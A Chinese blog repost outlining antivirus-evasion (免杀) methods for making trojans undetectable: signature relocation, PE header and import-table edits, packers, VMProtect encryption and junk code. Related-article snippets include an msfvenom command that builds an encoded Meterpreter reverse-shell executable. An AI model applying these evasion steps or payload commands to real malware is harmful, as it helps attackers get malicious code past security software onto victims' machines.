免杀常用手段

最新推荐文章于 2023-05-03 20:55:30 发布
最新推荐文章于 2023-05-03 20:55:30 发布
阅读量387 收藏 1
点赞数
原文链接:http://www.cnblogs.com/chengxin1982/archive/2009/10/22/1587793.html
版权

首先做免杀大家都知道免杀分为文件免杀,内存免杀,和行为免杀。


                     /通用转跳发:就是把特征码跳转到0区域,运行完后在跳回原地继续运行。
                     |
                     |            /上移法:根据代码的特点把特征码向上移动.\
                     |特征码移动法:                                  |有时候是整个区段上移以后介绍
                     |            \下移法:根据代码的特点把特征码向下移动./
                     |

                     |PE资源移动:把特征区段上下移动,在C32下在修正.(无名哥哥教的)终于会了!不容易啊!!
                     |
        /修改特征码免杀|区段加密法:用vmprotect类的加密工具把特征代码处加密。
       |             |
       |             |大小写替换法:在C32下发现特征码为字符串,可修改大小写达到免杀。
       |             |
       |             |PE头修改法:在C32下把PE头上移在修正头PE大小。(通常用在最后有反调    
       |             |试作用)
       |             |
       |             |出入表处修改:有些字符串在入表处我们无法用大小写替换法修改,用C32
文件免杀|             |把入表处特征000掉然后在LordPE中修正。(同免杀内存)
       |             |
       |             |等量替换法:把指令换为一些相似指令,或把16进制的数字改为大1或小1
       |              \的数字。
       |
       |加壳免杀:就是加一些生僻的壳,多重加壳。
       |
       |
       |技巧免杀:加UXP壳在用秘密行动大乱UXP头,入口加一.........
       |
       |

       |改壳:修改壳的特征码。方法同文件免杀。

       |
        \加花免杀:自己学会写一些花,司机大叔的数学不好,加花对卡巴最有效。

 

 

 

 

 

 


                     /通用转跳发:就是把特征码跳转到0区域,运行完后在跳回原地继续运行。

                     |

                     |大小写替换发:大小写替换法:在C32下发现特征码为字符串,可修改大小写达到免杀。

                     |

        /修改特征码免杀|          /把出如表参数移动到0区域在用lord pe修正 或上下移动在修正.

       |              \出入表修改|

       |                        \ 把出如表参数上移一位在用lord pe修正(男人哥哥教的)或上下移动在修正.

内存免杀|
       |

       |
        \工具修改:用007免疫类的工具反瑞星内存扫描。或加密保护.

转载于:https://www.cnblogs.com/chengxin1982/archive/2009/10/22/1587793.html

weixin_38168322
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
必学之通用跳转法
07-22
通用跳转法,对新手有帮助! 新手的你一定要看啦
工具--veil-evasion
11-21
工具--veil-evasion】是一种在网络安全领域中常用的工具,主要用于对抗反病毒软件和入侵检测系统,使得恶意代码能够避开检测并执行。它通常被安全研究人员、渗透测试人员以及恶意攻击者使用,目的是为了提升...
常见的几种方法
路虽远,行将至。事虽难,做必达。
03-05 6500
攻击机kali:192.168.1.11 靶机Windows7:192.168.1.18 1、自编码 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.11 lport=4444 -e x86/shikata_ga_nai -i 15 -f exe -o shell.exe 开启本地监听并在靶机运行木马,shell反弹成功,木马程序正常使用 微步沙箱检测结果,检出率近一半,效果一般 ​​​ ...
之路
weixin_34096182的博客
07-25 285
(一)、应注意的事项: 1.的测试(在线毒、毒软件上报、世界反毒网:http://www.virustotal.com/zh-cn/) 在这里我建议大家不要上传自己的马到这样的网站上去.一上传不要多久就会被了.大家还是把软装在自己的电脑,然后测试比较好. 2.一个好的***要过文件、内存、行为、主动防御等一些专软件. 3.目前一些常用软有:Ah...
常用技术方法
whatday的专栏
04-23 7032
00. 概述 什么是?来自百科的注解: ,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没...
方法大集结~
Ms08067安全实验室
04-28 663
“第三期”5.5号开班第三期课程进行了大幅度调整:除了对课程进行了优化,还增加了大量实战技术,如如何编写属于自己的远控、毒软件的结构逻辑和查原理、如何Windows Defender、火绒、如何绕过360、如何自己创造新的方式等。课程设计思路1.不追求噱头2.不引导黑产3.以科学的思路去学习我们认为在学习的过程中,主要是两个技巧或者说思路最为重要,一...
超详细教程
10-27
此文件可能是教程的一部分,详细介绍了在创建或修改恶意软件前的准备步骤,例如代码混淆、资源加密、API调用隐藏等,这些都是技术的常见手段教程通常涵盖以下几个关键知识点: 1. **代码混淆**:通过对...
360一步到位猛壳
09-22
总的来说,“360一步到位猛壳”代表了技术的一个实例,它揭示了安全防护与攻击手段之间的持续博弈。在信息安全领域,了解这些工具和技术有助于我们更好地理解和应对潜在的威胁。同时,作为IT专业人士,我们...
易语言程序器-易语言
06-13
2. **技术**:器的核心在于技术,这包括代码混淆、壳技术、特征码替换、API Hook等多种手段。开发者需要了解如何通过这些技术来改变程序的行为模式,使其在扫描过程中难以被识别。 3. **反调试技巧**:...
源码webshell
05-04
【源码Webshell】是一种特殊的Web应用程序代码,它被设计用来绕过安全系统,允许未经授权的远程访问和控制服务器。在网络安全领域,Webshell是黑客常用的工具,用于在目标服务器上执行命令、上传/下载文件以及...
VMProtect 1.22 程序保存 在做时不能修改的地方可以用它!
01-16
VMProtect 1.22 程序保存 在做时不能修改的地方可以用它!
方式
weixin_30611509的博客
06-24 470
这三种是目前毒软件常用毒模式。 1.文件查 毒软件对磁盘中的文件进行静态扫描,一旦发现文件带有病毒库中的病毒特征代码就给予查。(黑洞2005 服务端VS 卡巴做演示) 2.内存查 毒软件把病毒特征代码释放到内存中,然后与内存中的文件进行比对,发现有文件中带有病毒特征代码就给予查。(灰鸽子2005服务端 VS 瑞星做演示) 3.行为毒软件用木马运行后的一些特定的行为作为判断...
制作
weixin_33834628的博客
05-06 334
病毒,***,顾名思义 ,就是不能被毒软件侦测到,卡擦掉,这里面的技术,有简单的,有高深的,今天我就自己所了解到的一些小伎俩自己在这里留个记号,方便自己以后进步对比,也与大家共享我所学到的一些东西。 现在我就给大家讲讲做需要的一些的东西,由于不同的制作方法有不同的步骤,所以我写的东西,都是自己想到哪里写到哪儿。 材料:巧妇难为无米之炊,我们首先...
基础知识总结
w4y2'blog
04-27 1593
最近研究木马,先了解一下基础的知识,看了《不死的秘密》、《黑客攻防》等书籍,发现都大同小异,基本内容都是一样的,找特征码,修改特征码....我认为还是要针对毒软件的查特性来做,所谓知己知彼,用在上就特贴切。能够写在书本上的技术肯定不是最新的技术,反病毒软件肯定也有了应对措施,要想真正做到,还是要通过其它渠道学习或是自己深入研究。但是,曾经的方法并不是无用了,而
【转】基础 -技术及原理
tpriwwq的专栏
05-03 2357
的最基本思路就是去除其特征,这个特征有可能是特征码,也有可能是行为特征,只要在不修改其原有功能的情况下,破坏了病毒与木马所固有的特征,一次就能完成。
生命在于学习——
易水哲的博客
10-25 2227
一些的知识,没有实操。
技术有一套(方法大集结)
hackzkaq的博客
05-23 7202
零基础学黑客,搜索公众号:白帽子左一 00. 概述 什么是?来自百科的注解: ,也就是反病毒(AntiVirus)与反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus AV),逐字翻译为“反-反病毒”,翻译为“反毒技术”。 有本比较有名的书,想详细学习的同学可以去看看。《黑客攻防》 其实我大概好像只看过目录…( ╯□╰ ) 下面我介绍的是自己实践的一些方法,有没有效果,试试就知道了。 01. 简介 大概可以分为两种情况: 二进制的(无源
艺术 1: 史上最全的方法汇总
weixin_34303897的博客
09-20 3390
本文讲的是艺术 1: 史上最全的方法汇总, 从本文开始,我们将分三章来系统的讲述一下有关的各种技术。 虽然目前有很多方法可以让恶意软件使用某一技术绕过反病毒检测,但这些显然不是恶意软件的终极目标, 它们的最终目标是实现 “FUD”, “FUD” 是地下网络论坛的黑话,代表“恶意软件完全不可被检测到”的意思。 本文主要是通过介绍静态、...
加壳、脱壳以及如何病毒技术与原理
aitanwu4387的博客
12-30 921
壳,加壳,脱壳 在自然界中,我想大家对壳这东西应该都不会陌生了,由上述故事,我们也可见一斑。自然界中植物用它来保护种子,动物用它来保护身体等等。同样,在一些计算机软件里也有一段专门负责保护软件不被非法修改或反编译的程序。它们一般都是先于程序运行,拿到控制权,然后完成它们保护软件的任务。就像动植物的壳一般都是在身体外面一样理所当然(但后来也出现了所谓的“壳中带籽”的壳)。由于这段程序...
python
最新发布
09-11
Python是指在编写Python恶意代码时,通过一系列技术手段绕过毒软件的检测和阻止。在进行Python时,可以采取多种常用的静态技术,如特征码定位修改、填充花指令、文件加壳、内存执行、shellcode混淆、...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值